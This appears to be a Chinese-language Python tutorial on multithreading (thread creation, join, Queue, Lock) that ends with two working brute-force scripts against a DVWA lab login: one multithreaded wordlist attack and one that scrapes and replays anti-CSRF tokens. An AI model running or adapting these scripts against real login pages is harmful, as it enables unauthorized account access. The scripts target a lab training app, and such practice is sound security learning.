基础知识:
'''
@Time : 2020/3/29 14:30
@Author : laolao
@FileName: 2.py
'''
import threading
def thread_job():
print("This is an added Thread,number is %s" % threading.current_thread())
def main():
#查看现在有几个线程被激活
# [ < _MainThread(MainThread, started 17940) >]:默认的主程序的线程
print(threading.active_count())
# 查询被激活的线程都叫什么
print(threading.enumerate())
# 显示当前运行的程序是属于那个线程
print(threading.current_thread())
# 定义一个线程,括号里面写让线程执行的工作
added_thread = threading.Thread(target=thread_job)
added_thread.start() # 执行线程
if __name__ == '__main__':
main()
多线程的应用:
'''
@Time : 2020/3/29 14:30
@Author : laolao
@FileName: 2.py
'''
import threading
import time
def thread_job():
print('我是T1线程:T1 start')
for i in range(10):
time.sleep(0.1)
print("我是T1线程:T1 finish")
def T2_job():
print('我是T2线程:T2 start')
print("我是T2线程:T2 finish")
def main():
'''
target:让线程执行的工作
name:为这个线程取的名字
:return:
'''
added_thread = threading.Thread(target=thread_job,name='T1')
thread2 = threading.Thread(target=T2_job,name='T2')
added_thread.start() # 执行线程
thread2.start()
print('我跟T1线程同步执行')
# 如果希望自己的代码在线之后完成用join()
thread2.join()
print('我在T2线程执行后执行')
if __name__ == '__main__':
main()
Queue功能:
'''
@Time : 2020/3/29 14:30
@Author : laolao
@FileName: 2.py
'''
import threading
import time
from queue import Queue
def job(l,q):
for i in range(len(l)):
l[i]=l[i]**2
q.put(l)
def multithreading():
q = Queue()
threads = [] # 线程列表
data = [[1,2,3],[3,4,5],[4,4,4],[5,5,5]]
for i in range(4):
'''
定义4个线程,并用列表保存起来
'''
t = threading.Thread(target=job,args=(data[i],q))
t.start()
threads.append(t)
for thread in threads:
'''
把每一线程都一次加载到主线程中
'''
thread.join()
result=[]
for _ in range(4):
result.append(q.get())
print(result)
if __name__ == '__main__':
multithreading()
lock:
'''
@Time : 2020/3/29 14:30
@Author : laolao
@FileName: 2.py
'''
import threading
import time
from queue import Queue
def job1():
global A
lock.acquire()
for i in range(10):
A+=1
print('job2',A)
lock.release()
def job2():
global A
lock.acquire() # 设定锁
'''
锁上后job1就不会接触到这一段
'''
for i in range(10):
A+=10
print('job2',A)
lock.release() # 释放锁
if __name__ == '__main__':
A=0
lock = threading.Lock()
t1 = threading.Thread(target=job1)
t2 = threading.Thread(target=job2)
t1.start()
t2.start()
t1.join()
t2.join()
针对DVWA的多线程爆破:
import requests
import urllib.parse
import threading
import time
FLAG = 0
def getPayload(nameList,pwdList):
with open(nameList,'r') as f:
with open(pwdList,'r') as ff:
n=f.readlines()
p=ff.readlines()
ii=0
for i in n:
n[ii]=i.strip()
ii+=1
ii = 0
for i in p:
p[ii] = i.strip()
ii += 1
return [n,p]
def main(name,pwd,flag):
global FLAG
for i in name:
addthread = threading.Thread(target=burpForce,args=(i,pwd,flag))
if FLAG==0:
addthread.start()
def burpForce(i,p,flag,user_token=None):
global FLAG
headers={
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Cookie':'PHPSESSID=0lmbgvv0f96hmpoqqegn8cp6l0; security=high'
}
for j in p:
url = "http://192.168.171.130:2333/DVWA/vulnerabilities/brute/?username={0}&password={1}&Login=Login#".format(urllib.parse.quote(i),urllib.parse.quote(j))
re = requests.get(url=url,headers=headers)
print(">>"+url)
if re.status_code ==200 and flag in re.text:
print(">>用户名:{},密码:{}".format(i,j))
FLAG=1
return
if __name__ == '__main__':
name,pwd = getPayload('F:/饶狗狗的私人书架/user.txt',"F:/饶狗狗的私人书架/passowrd.txt")
main(name,pwd,flag='Welcome to')
Token验证的爆破[没用到线程]:
import requests
import urllib.parse
import threading
import time
from lxml import etree
def getPayload(nameList,pwdList):
with open(nameList,'r') as f:
with open(pwdList,'r') as ff:
n=f.readlines()
p=ff.readlines()
ii=0
for i in n:
n[ii]=i.strip()
ii+=1
ii = 0
for i in p:
p[ii] = i.strip()
ii += 1
return [n,p]
def main(name,pwd,flag):
user_token = burpForce(flag=flag,init=True)
for i in name:
for j in pwd:
res = burpForce(flag=flag,user_name=i,password=j,user_token=user_token)
if res !='YES':
user_token=res
else:
return
def burpForce(flag,user_name=None,password=None,user_token=None,init=False):
global headers,url
parm={}
if not init:
parm = {
'username': user_name,
'password': password,
'Login': 'Login',
'user_token': user_token
}
re = requests.get(url=url,params=parm,headers=headers)
print(re.url)
if re.status_code == 200:
if flag in re.text:
print(">>用户名:{},密码:{}".format(user_name,password))
return 'YES'
else:
token = etree.HTML(re.text).xpath('//input[@type="hidden"]/@value')
return token[0]
if __name__ == '__main__':
headers={
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Cookie':'PHPSESSID=0lmbgvv0f96hmpoqqegn8cp6l0; security=high'
}
url = "http://192.168.171.130:2333/vulnerabilities/brute/"
name,pwd = getPayload('F:/饶狗狗的私人书架/user.txt',"F:/饶狗狗的私人书架/passowrd.txt")
main(name,pwd,flag='Welcome to')
